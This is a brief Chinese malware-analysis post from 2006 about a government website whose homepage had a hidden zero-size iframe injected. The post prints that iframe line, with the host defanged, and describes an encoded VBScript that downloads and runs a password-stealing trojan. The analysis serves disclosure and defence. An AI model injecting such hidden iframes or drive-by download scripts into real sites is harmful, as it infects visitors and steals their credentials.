本文分析了一个政府网站首页被加入恶意代码的案例。恶意代码通过隐藏的iframe加载加密的VBScript脚本,用于下载并运行Trojan-PSW.Win32.QQShou.ix木马。
endurer 原创
2006-11-14 第1版
该政府网站首页末被加入代码:
/--------
<iframe src=hxxp://www.***.race*swd.com/wm.htm width=0 height=0 frameborder=0></iframe>
--------/
wm.htm 的内容为escape()加密的VBScript脚本代码,功能是利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 hxxp://www.***.race*swd.com/1**.exe,保存为 %temp% 中的 asde.exe,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。
1**.exe 文件大小为36.7 KB (37,619 字节),Kaspersky 报为 Trojan-PSW.Win32.QQShou.ix。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
